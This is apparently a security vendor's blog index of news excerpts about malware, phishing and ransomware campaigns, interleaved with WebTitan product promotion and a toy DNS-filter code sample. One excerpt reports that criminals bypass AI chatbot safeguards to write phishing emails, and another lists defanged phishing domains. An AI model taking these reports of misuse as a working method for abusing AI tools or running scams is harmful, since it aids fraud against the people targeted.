Internet Security News
Our Internet security news features the latest press releases from the world's largest online security companies, with details of the latest threats to be aware of and, unfortunately, Internet security news relating to significant data breaches. While some organizations will be grateful for the advance warning of an online threat – and details of how to protect themselves against it – for some the warnings will come too late.
Consequently, it is recommended that organizations protect themselves against all manner of online threats with an email filter and web filter from TitanHQ. Our Internet security solutions prevent users from accessing unsafe sites via phishing emails and malvertising, and from visiting websites that are vulnerable to exploit kits and malware. As many organizations already using TitanHQ solutions would agree, it is better to be safe than sorry.
by G Hunt | August 30, 2023 | Internet Security News, Web Filtering
A watering hole attack, as the name suggests, is a cyberattack that involves a place that is frequently visited. A threat actor compromises a website that is often visited by the targeted business or individual and loads malware onto that site, where it will be inadvertently downloaded or executed when a user lands on the page. The website is usually compromised by exploiting an unpatched vulnerability or by obtaining website administrator credentials. These attacks are often conducted by Advanced Persistent Threat (APT) actors in cyber espionage campaigns, and one such campaign has recently been detected that has been attributed to the Chinese APT group tracked as TA423, which delivers the JavaScript-based reconnaissance tool ScanBox.

The campaign targets offshore energy firms that operate in the South China Sea. While watering hole attacks often see malware written to disk, this campaign is different, as ScanBox is executed in the web browser and requires no malware to be downloaded. Once executed, ScanBox logs keystrokes and records all activity on the infected website, including any passwords that are entered.

As is often the case with these watering hole attacks, the user is directed to the website via a phishing email. In this campaign, targeted individuals receive messages requesting collaboration that appear to have been sent by an Australian media organization – the fictional Australian Morning News. The website to which the user is directed includes news content scraped from legitimate news outlets, and landing on the site will see the user served with the ScanBox framework, which is used for reconnaissance and browser fingerprinting. In addition to collecting information about the browser, operating system, extensions, and plugins, the attack sets up Interactive Connectivity Establishment (ICE) communications with STUN servers, allowing communication with victim devices without having to go through network address translation (NAT) gateways and firewalls.
Watering hole attacks have been conducted by a range of different APT groups and these attacks have been the initial access vector of choice for Iranian threat actors for several years. Earlier this...
by G Hunt | June 22, 2023 | Cybersecurity Advice, Internet Security News, Web Filtering
ChromeLoader is a family of malware that is extremely prevalent and persistent. The malware installs malicious browser extensions, and removing them can be problematic, as users are denied access to the Google Chrome extension list to prevent the removal of the malicious extensions if they are discovered. These malicious extensions are used to deliver unwanted ads and redirect users to websites that they would otherwise not visit. At best, infection is a nuisance; however, the malware can increase the attack surface of a system and can easily lead to other malware being delivered.

ChromeLoader was first observed in January 2022 and infections are now extremely widespread. The malware is most commonly spread via sites that offer pirated software – torrents and warez sites – with the malware usually delivered through infected ISO image files. Several campaigns have been detected that advertise pirated software, games, and movies on social media networks, especially Twitter, with the posts/tweets including links to download sites. When the installation file is downloaded and installed, the user will likely get the software, operating system, or game they are expecting, but ChromeLoader and/or other malware will also be installed.

A new ChromeLoader distribution campaign has recently been detected by HP's Wolf Security team. They report that the campaign has been active since at least March 2023 and delivers ChromeLoader, which installs a malicious adware browser extension called Shampoo. Shampoo performs unwanted redirects to a variety of websites, including fake giveaways, games, and dating sites. These redirects can simply be annoying but can also risk other malware infections. The malicious browser extension is also difficult to uninstall, as the user is prevented from accessing Chrome Extensions. If the user does manage to uninstall the adware, it will simply be reloaded when the device is rebooted, via a Windows scheduled task.
According to HP, this campaign uses a network of malicious websites that offer pirated material. The download sites deliver VBScripts that execute PowerShell scripts that fetch Shampoo and install the malicious Chrome extension....
by G Hunt | April 30, 2023 | Cybersecurity Advice, Internet Security News, Security Awareness Training
There has been a notable increase in search engine poisoning for distributing malware. Search engine poisoning is the term given to the manipulation of search engine results to display links to malicious websites. These websites can be used to phish for sensitive information, but the technique is most commonly used for distributing malware.

Search engine poisoning can be achieved in different ways. One way it is used to target businesses is to create a webpage and use search engine optimization techniques to target specific search queries. It can take a lot of time and effort to get webpages appearing in the organic search results for key search terms, but since the queries typically targeted have little competition, it is quite easy to get pages appearing high up in the organic search engine listings. Attackers typically target low-volume business search queries, such as searches for contract templates, forms, and agreements. Since the person performing the search is looking to download the content, they can easily be tricked into downloading a malicious file. Oftentimes the user will get the file they are looking for, but the file will silently install malware when it is opened.

Google is well aware that the higher up a webpage is in the search results, the more likely it is to be visited. The prime spots are at the very top of the search engine results, and that area is reserved for sponsored links. Getting a malicious site into these links will maximize traffic to the website, and advertisers compete for these advertising slots through the Google Ads online advertising platform. Advertisers can bid for these slots for the key search terms they want to target. Google Ads are increasingly being used by malicious actors as an alternative method of search engine poisoning, and they achieve the greatest success when they target popular software downloads.
An attacker will create a website advertising a popular software solution, often cloning the website of a legitimate brand. They will offer a download of that software on the site but will alter the installation file so that in addition to installing the software, malicious code will...
by G Hunt | March 31, 2023 | Internet Security News
Identifying phishing attempts used to be fairly straightforward for end users. The messages often contained grammatical errors and spelling mistakes that had been inadvertently included by their authors. Phishing campaigns are often conducted by individuals who do not speak English as a first language, so errors will inevitably be made, and it is those errors that make it fairly easy for people to spot a phishing attempt. Those errors may soon become a thing of the past thanks to artificial intelligence tools such as ChatGPT.

ChatGPT and other large language model AI tools can be used to create perfect English (or other-language) text, and therefore convincing text for use in phishing and social engineering attacks. Evidence is growing that these tools are being adopted by malicious actors to create phishing content that is indistinguishable from content a human could create, and in many cases it is even better. Europol has recently issued an alert about the malicious use of these AI tools for phishing and warned that the problem is likely to get worse. It is not just a case of being able to draft a grammatically correct email devoid of spelling mistakes: these AI chatbots can write emails in whatever style the threat actor wants, including the authoritative tone one would expect from an official government communication.

The biggest threat is likely to be highly targeted emails – spear phishing. Spear phishing has a far higher success rate than standard phishing attempts, as emails are carefully crafted to attack a very small number of individuals. That requires considerable research to ensure that the scam is convincing and that the email will likely be opened and the request followed. The ability of AI tools to create spear phishing emails should not be underestimated. The messages these tools generate can be exactly what a threat actor needs, and the process can be largely automated, which means a higher success rate and more attacks.
These tools are significantly lowering the barrier of entry for conducting phishing attacks, and while there are restrictions in place to prevent the malicious use of these AI tools, they are being bypassed. You...
by G Hunt | February 28, 2023 | Internet Security News
Exploit kits are no longer as popular as they once were, but they are still being used as a vehicle for distributing malware. An exploit kit is a program loaded on an attacker-controlled website that scans for vulnerabilities when visitors land on the site and exploits those vulnerabilities to silently deliver malicious payloads. Exploit kits were first detected in 2006 and were once one of the most common ways that malware was distributed, typically exploiting vulnerabilities in browsers and browser applications such as Adobe Flash, Microsoft Silverlight, Java, and ActiveX to deliver information stealers, remote access Trojans, and ransomware.

Since 2017, exploit kits have been in decline, in large part due to Adobe Flash reaching end-of-life. Adobe Flash vulnerabilities were among the most exploited vulnerabilities. Today, exploit kits are still used for distributing malware, most commonly crypto-mining malware, although under the exploit-kit-as-a-service model they are used to deliver a variety of payloads. Some of the most successful exploit kits are now fileless: they write no files to disk and instead load malicious code into memory. Traffic to these exploit kits is most commonly generated through malvertising – malicious adverts displayed on legitimate websites, either through the third-party ad blocks that website owners use to increase revenue or through compromised websites.

In recent years, the RIG exploit kit has been one of the most successful. The RIG exploit kit first appeared in 2014 and was active until 2017, when a coordinated operation led by RSA Research successfully shut down and removed its infrastructure. According to the researchers who were part of that takedown, the operators of RIG had successfully hacked hundreds of hosting accounts – mostly on GoDaddy – and hid their malicious code inside hidden subdomains – shadow domains – to avoid detection.
The RIG exploit kit was loaded onto tens of thousands of active shadow domains. The operators are thought to have gained access to those hosting accounts by conducting phishing attacks to steal credentials and through brute force attacks on hosting accounts with...
by G Hunt | July 30, 2022 | Internet Security News, Network Security, Security Awareness Training
Most people are aware of the importance of cybersecurity and the need to take care when opening emails, browsing the Internet, or downloading apps on their mobile phones. If you ask anyone whether they are knowledgeable about cybersecurity and whether they can recognize a malicious website or email, there is a high chance they will say yes. A recent survey conducted by AT&T of 2,000 U.S. adults confirms that: 70% of respondents said they were knowledgeable about cybersecurity, two-thirds said they know how hackers gain access to sensitive information on devices, and 69% said they were able to recognize suspicious websites at a glance.

However, despite this awareness of the importance of cybersecurity, cybersecurity best practices are not always followed. People take considerable risks with email and the Internet, and the survey suggests that their confidence in their ability to recognize scams, malicious websites, and suspicious emails is misplaced. While most people claim to be able to recognize a suspicious website, only 45% of respondents said they knew those sites carried a risk of identity theft. 46% of respondents were unaware of the difference between active and passive cybersecurity threats. Passive cybersecurity threats are those where a threat actor simply monitors communications and gathers sensitive information, whereas an active attack involves some action or modification of communications. An example of a passive attack is a malicious actor eavesdropping on a connection to a website via an evil twin Wi-Fi access point. An example of an active attack would be a malware attack.

The average person lands on 6.5 malicious websites or suspicious social media accounts every day, and in many cases those sites are accessed deliberately. Suspicious websites include those that start with HTTP rather than HTTPS, which means the connection between the web browser and the website is not encrypted.
Suspicious sites include those with lots of pop-ups, or unverified sites and social media accounts. 39% of respondents said they accessed suspicious streaming websites to view major sporting events, 37% would download files from...
by G Hunt | June 30, 2022 | Cybersecurity Advice, Cybersecurity News, Internet Security News, Network Security
Ransomware gangs gain initial access to business networks using a variety of techniques, with phishing being one of the most common. Phishing is used to obtain credentials, especially for cloud-based services and applications, and phishing emails are often used to deliver malware loaders. Once installed, the malware loader drops malicious payloads, which ultimately result in a network-wide ransomware attack.

A relatively new malware loader – Bumblebee – is now gaining popularity with ransomware gangs and is known to be used by some of the highest-profile ransomware operations. According to Symantec, the Bumblebee loader is known to be used by Conti, Quantum, and Mountlocker, and possibly others, and has fast become the ransomware delivery vehicle of choice. The Bumblebee loader is primarily delivered via phishing emails and is used to create a backdoor in victims' networks, allowing the attacker to take control of devices and execute commands. Bumblebee has been observed delivering the Cobalt Strike attack framework, which is used for lateral movement within networks. Once a sufficiently high number of devices and systems have been compromised, the Bumblebee loader drops the ransomware payload. After sensitive data has been exfiltrated from the victim's systems, the file encryption process is initiated.

According to Symantec, the Bumblebee loader has replaced several other malware variants that have proven popular with ransomware gangs in the past, such as the TrickBot Trojan and BazarLoader. The replacement of those malware variants with the Bumblebee loader appears to have been pre-planned. If the Bumblebee loader is detected on any device, rapid action should be taken, as it is likely that the malware could lead to a ransomware attack.

The Growing Threat of Ransomware Attacks

Ransomware attacks on businesses increased significantly in 2021.
The Federal Bureau of Investigation (FBI) reported in its 2021 Internet Crime Report that the FBI Internet Crime Complaint Center (IC3) received 2,084 reports of ransomware attacks between January 1 and July 31, 2021, which represents a 62% increase year-over-year. The 2021...
by G Hunt | January 26, 2022 | Cybersecurity Advice, Internet Privacy, Internet Security News, Web Filtering
Cybercriminals are constantly developing new tactics to trick individuals into divulging sensitive information or installing malware. One of the latest tactics to be observed is the use of QR codes to direct people to malicious websites where sensitive information is harvested, or to sites hosting malware.

A QR code is a machine-readable matrix barcode that is often used for tracking products in a supply chain, but in recent years it has been adopted as a convenient way to direct people to web resources without them having to enter a URL or click a link. QR codes have been widely adopted during the COVID-19 pandemic for carrying out contactless operations, such as registering attendance at a venue and viewing menus in restaurants, to help prevent the spread of COVID-19. Many smartphones have built-in QR code readers, and apps can be downloaded for free to allow QR codes to be read. When a smartphone camera picks up a QR code, the user will be directed to whatever web resource has been programmed into the code.

While QR codes have many important uses, they can easily be tampered with to direct individuals to malicious websites. Phishing emails often contain links to malicious websites that have been masked by changing the text of the hyperlink. Hovering the mouse pointer over a hyperlink on a computer will display the URL to which the user will be directed; with a QR code, however, the user may be instantly directed to the website and could be prompted to enter their banking credentials, Microsoft 365 credentials, or other sensitive information. Since QR codes are often used to direct individuals to hosted files, such as PDF restaurant menus, it would be easy to trick people into downloading malicious files through QR codes. The malware could provide a cybercriminal with access to the victim's mobile device, allowing them to steal sensitive information such as passwords or bank account information.
Many businesses use QR codes to direct customers to websites where payments can be processed, and the use of QR codes for this purpose has increased significantly during the pandemic to avoid contact with Point-of-Sale card readers. QR codes could be abused to direct...
by G Hunt | October 20, 2021 | Internet Security News, Web Filtering
A phishing campaign has been identified that uses spoofed unemployment benefits websites to trick people into disclosing sensitive personal and financial information. These websites have been designed to closely resemble the official U.S. government websites that are used to apply for unemployment benefits. Individuals arriving on the websites are prompted to enter personal and financial information as part of the claims process. The information provided can be used by the scammers to file fraudulent unemployment benefits claims and have payments directed to their accounts. The credentials and information harvested through the sites can also be used or sold to other cybercriminals to commit identity theft and fraud, and some of the sites are used for installing malware onto victims' devices, including ransomware.

The U.S. Federal Bureau of Investigation (FBI) has received an increased number of complaints about these scams through its Internet Crime Complaint Center in recent weeks, prompting the FBI to issue an alert about the scams. At the time of issuing the alert, the FBI had identified 385 domains hosted on the same IP address, 8 of which impersonated official government websites that host unemployment benefit platforms. Those sites have a .xyz top-level domain (TLD) rather than .gov, and mostly impersonate state-level websites. The malicious websites include employ-nv[.]xyz, gov2go[.]xyz, illiform-gov[.]xyz, mary-landgov[.]xyz, and newstate-nm[.]xyz, which were all still active at the time of the alert, along with employ-wiscon[.]xyz, marylandgov[.]xyz, and newstatenm[.]xyz, which are no longer active.

Campaigns such as this are nothing new, but the number of complaints received about the scams is increasing, as is the number of reported cases of identity theft. Figures from the U.S. Federal Trade Commission show identity theft reports doubled between 2019 and 2020, with more than 1.4 million reports received last year.
Several steps can be taken to avoid becoming a victim of these scams. It is important to exercise caution when visiting any website and ensure that the spelling of the web address is correct, and the website has a .gov TLD. The U.S. government...
by G Hunt | August 18, 2021 | Internet Security News, Network Security, Web Filtering
To those unfamiliar with DNS filtering, it is a form of web filtering that is used to filter out unwanted and undesirable web content, whether that is webpages containing objectionable material such as pornographic images or cyber threats such as websites used for phishing or malware distribution. The Domain Name System (DNS) is what makes it possible for websites to have easy-to-remember domain names. A domain name, such as google.com, is easy for people to remember, but of no use to a computer, which requires an IP address to find that resource on a remote server. The DNS is used to convert a domain name into its corresponding IP address, and DNS filtering is web filtering that takes place at the DNS lookup stage of a web request, before a connection is made to the server hosting the web content.

DNS Filtering Myths

DNS filtering has several advantages over standard web filtering. Filtering occurs before any content is downloaded, which is better for speed and security. With DNS filtering, there is next to no latency – page load speeds are unaffected. Many businesses fail to appreciate the importance of DNS filtering; after all, what is the point of blocking malware and ransomware threats on the Internet when antivirus software is installed on all endpoints? While AV software is effective at blocking known malware threats, it will not block new threats that have not been seen before, as the signatures of those malware variants are not in the virus definition lists of AV software. New variants of old malware are constantly being released to bypass signature-based AV defenses, so additional protection is needed. DNS filters can block these threats based on the reputation of IP addresses and will block downloads of file types associated with malware. DNS filtering also improves defenses against phishing attacks, which all too commonly result in costly data breaches.
Phishers are constantly devising new methods to get their emails into inboxes and trick end users into clicking on links and disclosing their credentials. Spam filters will block most of these messages but not all, and security awareness training only goes so far. A web filter will block...
by G Hunt | July 30, 2021 | Internet Security News, Network Security
Ransomware gangs have been feeling the heat following the DarkSide ransomware attack on Colonial Pipeline in May, which forced the company to shut down its fuel pipeline serving the U.S. East Coast for a week. Any attack on critical infrastructure is likely to draw a response from the U.S. government, so it is no surprise that ransomware gangs faced a great deal of scrutiny after the attack. The DarkSide group shut down following the attack, and several other ransomware gangs went quiet.

DoppelPaymer was one of the gangs that appeared to be lying low. Around a week after the Colonial Pipeline attack the group went quiet, and no further updates were posted on the group's data leak site after May 6, 2021. It is not uncommon for ransomware operations to go quiet for a few weeks, but they usually return. In many cases, the threat group reappears with a tweaked ransomware variant that is used under a new name, as has happened with DoppelPaymer. DoppelPaymer attacks often start with a phishing email with links or attachments that install other malware variants, which in turn deliver the ransomware payload. Prior to the Emotet botnet being shut down, that banking Trojan was used to deliver DoppelPaymer, as well as Dridex.

Security researchers investigating a new ransomware-as-a-service operation called Grief (PayorGrief) that appeared in June identified striking similarities between Grief and DoppelPaymer, leading them to the conclusion that they are one and the same. A sample of the malware was found that dates back to May 17, indicating the group had only stopped attacks for a very short period of time. Grief and DoppelPaymer both use the same encrypted file format and are both distributed in phishing emails via the Dridex botnet, and one of the analyzed Grief samples was also found to link to the old DoppelPaymer portal, although the samples identified since point to a separate Grief RaaS portal.
Analyses of the code and the leak site also revealed further similarities such as the use of identical encryption algorithms and matching General Data Protection Regulation (GDPR) warnings for non-paying victims about GDPR penalties. The group appears to have been quite...
by G Hunt | July 24, 2021 | Cybersecurity News, Internet Security News, Web Filtering
A new malware dubbed Crackonosh is being used in attacks on gamers with the goal of hijacking the resources of their computers to turn them into cryptocurrency mining rigs. Cryptocurrency prices have been soaring in recent months, with many reaching record prices. That makes mining cryptocurrency profitable, and even more so when using the powerful computers of gamers without their knowledge. The gamers cover the electricity costs and supply the hardware, while the coin mining profits go to the scammers.

Getting malware onto gamers' devices is the key to this scam, and what better way to do that than to offer gamers free versions of popular games such as Grand Theft Auto V, Pro Evolution Soccer 2018, or NBA 2K19. These cracked games can be installed without having to make a purchase, with the games offered free in forums. Currently, most infections have come via forums, but the games could easily be hosted on a website and traffic driven to those sites through malicious adverts in the search engines or third-party ad blocks on any number of high-traffic websites.

The games are legitimate, although they have been cracked to allow them to be installed without having to purchase the game key. The correct game will be installed, but bundled into the installer are several other files that execute in the background and install the Crackonosh malware, which is capable of disabling certain antivirus programs, including Windows Defender, to ensure it is not detected. It also disables Windows Update to ensure that Windows Defender is not reactivated. Since the malware creates and stores an icon in the system tray, the user will most likely be unaware that their antivirus software has been disabled. One of the main aims of Crackonosh malware is to deliver a legitimate cryptomining program named XMRig, although in this case XMRig is used to hijack the CPU and GPU of victims' devices and use those resources for generating cryptocurrency.
Using XMRig on one gaming computer will not make much money, but at scale the operation is hugely profitable. The malware distribution campaign has proven successful, with the malware found in more than a dozen countries, with the highest...
by G Hunt | June 28, 2021 | Cybersecurity Advice, Internet Security News, Network Security, Web Filtering
Ransomware is now one of the biggest threats faced by businesses. When hackers gain access to business networks, it is now common for large quantities of data to be stolen prior to file encryption. Ransomware gangs know all too well that businesses with good backup policies will be able to restore their encrypted data from backups, but those businesses will still need to pay the ransom in order to prevent the release or sale of the stolen data. Even when files can be recovered from backups, many businesses feel they have no alternative other than paying the ransom to ensure stolen data are deleted. Data from Coveware indicates 70% of ransomware attacks now involve data theft.

Ransomware attacks are incredibly costly, even if the ransom is not paid. Universal Health Services Inc. in the United States suffered a Ryuk ransomware attack in September 2020, and the health system chose not to pay the ransom. Add up the recovery costs, which included data restoration, cybersecurity consultants, notification letters to patients, and the loss of many services during the remediation process, and the cost of the attack rose to $67 million.

While expensive, that high cost is just a fraction of the cost of the recent Conti ransomware attack on Ireland's Health Service Executive. The May 2021 ransomware attack caused massive disruption to healthcare services in Ireland. Without access to patient records, patient safety was put at risk, non-urgent appointments had to be cancelled, and there were major delays getting test results. A few days after issuing a ransom demand of €20 million, the Conti ransomware gang gave the HSE the decryption tools free of charge. Even with the valid tools to decrypt data, recovery has been slow and incredibly costly. It has been around a month since the tools were provided to decrypt files, but many systems are still inaccessible. HSE Chief Executive Paul Reid said it is likely to take months before all systems are brought back online.
Simply eradicating the attacker from the network and recovering encrypted data is only part of the story. IT systems need to be upgraded, security greatly improved, and a security operation center needs to be set up to monitor the...
by G Hunt | May 14, 2021 | Cybersecurity News, Internet Security News, Web Filtering
TitanHQ has announced a new version of WebTitan Cloud has been released that brings new features and improved security. The release of WebTitan Cloud version 4.16 has allowed TitanHQ to introduce a new web filtering solution for the education sector – WebTitan OTG (on-the-go) for Chromebooks. The use of Chromebooks has been steadily increasing, especially in the education sector where they are a cost-effective option for schools to allow students to access the Internet. Internet access is important in education, but it is vital that students can access the Internet safely and securely. Controls need to be implemented to prevent students from accessing age-inappropriate content such as pornography, devices need to be protected from malware and ransomware, and phishing and other malicious websites should be blocked. WebTitan OTG for Chromebooks allows IT professionals in the education sector to easily implement web filtering controls for individuals, user groups, or globally to ensure compliance with federal and state laws, including the Children’s Internet Protection Act (CIPA) and protect their students and their devices from threats. WebTitan OTG for Chromebooks, like other WebTitan products, is a DNS-based web filter that applies filtering controls at the DNS lookup stage of web requests. That means there is no latency – Internet speed is unaffected. Since WebTitan is entirely cloud-based, there is no need for any additional hardware and the solution requires no proxies or VPNs. Set up is easy and user and device level web filtering for Chromebooks can be set up in just a few minutes. The solution provides protection for students regardless of where the Internet is accessed – students will have access to a clean, safe, filtered Internet in the classroom and at home, and it is also easy to lockdown Chromebooks to prevent any bypassing of filtering controls. 
Administrators also have full visibility into Internet access, including locations, web pages visited, and attempts made to visit prohibited content.
Support Added for Azure Active Directory
WebTitan Cloud version 4.16 includes DNS Proxy 2.06, which supports filtering of users in Azure Active Directory,...
by G Hunt |
March 19, 2021 |
Internet Security News, Web Filtering
The pandemic forced many businesses to accelerate their digital transformation strategies to support an at-home workforce and survive the pandemic; however, this new approach to working was not without risk. Cybercriminals took advantage of companies that failed to address vulnerabilities, with some of the most widely exploited vulnerabilities in 2020 being in remote access solutions such as the Pulse Secure VPN. Brute force attacks against Remote Desktop Protocol skyrocketed as more businesses switched to remote working, and while many businesses have opened their offices once again, the brute force attacks are still occurring at levels far above those before the pandemic. Threat actors also stepped up their attacks on remote workers early on in the pandemic, and attacks are continuing as lockdowns persist and employees continue to work from home. Many businesses address these risks through security awareness training and teach employees cybersecurity best practices and how to identify threats such as phishing. A little security awareness can go a long way and can be the difference between a threat being recognized and avoided or a link in a phishing email being clicked without thinking by an employee. There are many threats that businesses may not be aware of, one of which was highlighted by a recent YouGov survey. Throughout a large part of the pandemic, schools have been closed and children have been home schooled. The survey revealed a quarter of UK workers have allowed their children to use their corporate device as part of home schooling and for other purposes such as socializing and gaming. An employee may know not to engage in risky online activities, but children using work devices for Internet access leaves businesses vulnerable to cyberattacks.
The survey, conducted on 2,000 UK employees, also revealed 70% of employees could access social media websites on their corporate devices and, despite it being one of the most fundamental aspects of security, 74% of employees said they did not use a unique password for all accounts. During the pandemic, when employees are isolated and may be struggling with home schooling as well as working, it is understandable...
by G Hunt |
February 26, 2021 |
Cybersecurity News, Email Archiving, Internet Security News, Web Filtering
TitanHQ has announced that three of its cybersecurity solutions have been named winners at the 2021 Expert Insights’ “Best-Of” Awards, beating some of the best-known email security, web security, and email archiving products on the market. For more than 25 years, TitanHQ has been developing innovative cybersecurity solutions to protect businesses from email and web-based threats to their networks and data. TitanHQ’s multi-award-winning products are used by more than 8,500 businesses in over 150 countries, and 2,500 Managed Service Providers (MSPs) offer TitanHQ solutions to their customers to protect them from phishing, malware, ransomware, botnets, viruses, and other cyber threats. Expert Insights is a respected website that was created in 2018 to help businesses research and select the best cybersecurity solutions to protect their networks and data from cyber threats. Through impartial product reviews, advice from cybersecurity experts, and industry analysis, IT leaders can discover the best cybersecurity solutions to meet their unique needs. The website helps more than 40,000 businesses a month with their research into cybersecurity products and services. Each year, Expert Insights recognizes the leading cybersecurity service and solution providers and their products at the Expert Insights’ “Best-Of” Awards. Technical experts with decades of experience in the cybersecurity industry assess products based on several factors, including ease of use, range of features, the protection provided, and market position, as well as how each product is rated by verified business users. The top products then receive an Expert Insights’ “Best-Of” Award.
This year, TitanHQ was recognized by Expert Insights for the powerful threat protection provided by its products, the ease-of-use of the solutions, and their cost-effectiveness, which is why the solutions have proven to be so popular with enterprises, SMBs and MSPs looking for comprehensive protection against email and web-based threats. “2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime,” said Expert Insights CEO and Founder...
by G Hunt |
January 30, 2021 |
Cybersecurity Advice, Internet Security News, Network Security, Web Filtering
DNS filtering – or Domain Name System filtering to give it its full title – is a technique for blocking access to certain websites, webpages, and IP addresses. The DNS is what allows easy-to-remember domain names to be used – such as Wikipedia.com – rather than typing in very difficult-to-remember IP addresses – such as 198.35.26.96. The DNS maps domain names to IP addresses to allow computers to find web resources. When a domain is purchased from a domain registrar and that domain is hosted, it is assigned a unique IP address that allows the site to be located. When you attempt to access a website, a DNS query will be performed. Your DNS server will look up the IP address of the domain/webpage, which will allow your browser to make a connection to the web server where the website is hosted. The webpage will then be loaded. The actual process involves several different steps, but it is completed in a fraction of a second.
So how does DNS Web Filtering Work?
With DNS filtering in place, rather than the DNS server simply returning the IP address if the website exists, the request is subjected to certain controls. DNS blocking occurs if a particular webpage or IP address is known to be malicious. The DNS filter will use blacklists of known malicious websites, the results of previous crawls of websites and web pages, or a real-time assessment of the web content if the web page or website has not previously been crawled and categorized. If the website being accessed is determined to be malicious or otherwise violates pre-defined policies, instead of the user being connected to the website, the browser is directed to a local IP address that displays a block page explaining why the site cannot be accessed. This control could be applied at the router level, via your ISP, or by a web filtering service provider. In the case of the latter, the user – a business for instance – would point their DNS to the service provider.
That service provider maintains a blacklist of malicious webpages/IP addresses and access to those sites is prevented. Since the service provider will also categorize webpages, the DNS filter can also be used to block access to certain categories of...
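The lookup-time decision described above, as an added example for this article (it is not WebTitan or any TitanHQ code): a toy DNS-layer filter consults a blacklist and a category database when a name is looked up and, if policy says block, answers with a local block-page address instead of the real one, logging every attempt so an administrator can see what was requested. The domains, addresses, categories and blacklist entries are all constructed sample data, and the block-page address is an assumption.

```python
"""Toy DNS-layer policy filter (added example, not WebTitan/TitanHQ code).

Shows the decision point a DNS filter sits at: when a name is looked up, a
blacklist and a category database are consulted and, if policy says block,
the client receives a local block-page address instead of the real one.
All domains, IPs, categories and the blacklist are constructed sample data.
"""
from dataclasses import dataclass, field
from typing import Iterator, List, Optional, Set, Tuple

BLOCK_PAGE_IP = "10.0.0.53"  # assumed: local host serving the "why was this blocked" page

# Constructed stand-ins for a provider's blacklist, category DB and upstream answers.
BLACKLIST: Set[str] = {"evil-downloads.example", "phish-login.example"}
CATEGORIES = {"news.example": "news", "casino.example": "gambling"}
UPSTREAM = {
    "news.example": "203.0.113.10",
    "casino.example": "203.0.113.20",
    "evil-downloads.example": "203.0.113.40",
    "cdn.evil-downloads.example": "203.0.113.41",
    "phish-login.example": "203.0.113.50",
}


@dataclass
class Policy:
    """Categories this tenant/group chose to block; malicious sites are always blocked."""
    blocked_categories: Set[str] = field(default_factory=set)


@dataclass
class Verdict:
    name: str
    answer: str          # IP handed back to the client, or "NXDOMAIN"
    blocked: bool
    reason: Optional[str]


def parent_domains(name: str) -> Iterator[str]:
    """Yield the name and each parent, so a listing of b.example also covers a.b.example."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def classify(name: str) -> Tuple[str, Optional[str]]:
    """Return (category, matched_domain); a blacklist hit wins over category data."""
    for dom in parent_domains(name):
        if dom in BLACKLIST:
            return "malicious", dom
    for dom in parent_domains(name):
        if dom in CATEGORIES:
            return CATEGORIES[dom], dom
    return "uncategorized", None


def resolve(name: str, policy: Policy, log: List[Verdict]) -> Verdict:
    """Answer a lookup: real address if allowed, block-page address if not; always log."""
    category, matched = classify(name)
    if category == "malicious":
        verdict = Verdict(name, BLOCK_PAGE_IP, True, f"blacklisted via {matched}")
    elif category in policy.blocked_categories:
        verdict = Verdict(name, BLOCK_PAGE_IP, True, f"blocked category {category}")
    else:
        verdict = Verdict(name, UPSTREAM.get(name.lower(), "NXDOMAIN"), False, None)
    log.append(verdict)  # the log is what gives admins visibility into blocked attempts
    return verdict


if __name__ == "__main__":
    school = Policy(blocked_categories={"gambling"})
    audit: List[Verdict] = []
    for q in ("news.example", "cdn.evil-downloads.example", "casino.example", "unknown.example"):
        print(resolve(q, school, audit))
```

The parent-domain walk is the part worth noting: a single blacklist entry for a domain also covers every hostname beneath it, which is how a filter blocks a malicious CDN hostname it has never seen before.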
by G Hunt |
January 27, 2021 |
Cybersecurity News, Internet Security News
A phishing campaign is underway which is distributing a new variant of the DanaBot Trojan. The DanaBot Trojan was first identified in May 2018 and has been actively distributed via phishing emails for more than two years. In the summer of 2020, activity slowed but the campaigns resumed in October. DanaBot is a modular banking Trojan used in targeted geographical attacks on businesses. The first variant that emerged in 2018 was used in targeted attacks in Australia, while the second variant was primarily used in attacks on U.S. companies. Attacks have also been conducted in Europe, primarily in Ukraine, Austria, Poland, Italy, and Germany. The latest variant is the fourth to be identified and has been released around a year after the third variant was identified in February 2019. The latest variant has had several technical anti-analysis changes made to the main component of the malware and its method of maintaining persistence has changed. The latest variant now achieves persistence through a LNK file loaded into the user’s startup folder, which launches the malware when the device is booted. Affiliates are used to conduct campaigns distributing the DanaBot Trojan under the malware-as-a-service model. Several new affiliate IDs have been added which suggests the malware-as-a-service operation is growing. It is therefore probable that DanaBot will grow into a much bigger threat in 2021. Previously, DanaBot has been primarily distributed via spam emails that deliver a malware dropper, which downloads the banking Trojan via a multi-stage process. It now appears that the malware is being distributed via websites that offer cracks and software keys for pirated software such as graphics software, VPNs, antivirus software, and games.
Protecting Against Banking Trojans by Blocking Malware Delivery
Protecting against DanaBot and other Trojans requires a range of security measures. Two of the most important are an advanced spam filter and a web filtering solution.
The spam filter will detect malicious emails that attempt to deliver the malware dropper, while the web filter will block access to the websites that are used to download the malware. TitanHQ has developed a...
by G Hunt |
January 25, 2021 |
Cybersecurity Advice, Internet Security News, Network Security
COVID-19 presented many new opportunities for cybercriminals, many of which have proven to be highly successful. In the early days of the pandemic, when it became clear that the new coronavirus was spreading beyond the borders of China and concern about the virus grew, cybercriminals switched from their normal phishing campaigns and started adopting COVID-19 lures. Phishing campaigns were conducted offering advice about the virus and potential cures, as people craved information that was in short supply. Fake COVID-19 tracking apps and websites were set up that collected sensitive information or installed malware, and PPE shortages saw fake shops set up offering non-existent supplies. Then there were fake charities, disinformation campaigns, and phishing scams related to job retention schemes, self-employment income support, government coronavirus loans, and fake tax rebates. The move to remote working due to the pandemic saw hackers targeting vulnerabilities in remote working solutions such as VPNs, and throughout 2020 ransomware gangs were extremely active, especially in Q3 and Q4 2020 when attacks soared. As we move into 2021, cybercriminals are likely to continue to exploit the pandemic to steal credentials, access sensitive data, and spread malware and ransomware, so it is important for businesses not to let their guard drop and to continue to ensure that they have appropriate protections in place to block threats.
The Cyber Threat Landscape in 2021
The high level of ransomware attacks in the last quarter of 2020 is likely to continue in 2021. There are no signs that cybercriminals will reduce attacks, as they are still proving to be profitable. The healthcare industry is likely to continue to be targeted, with cyberattacks on pharmaceutical and clinical research firms also extremely likely. Now that COVID-19 vaccines have been approved and are starting to be rolled out, cybercriminals have yet another opportunity.
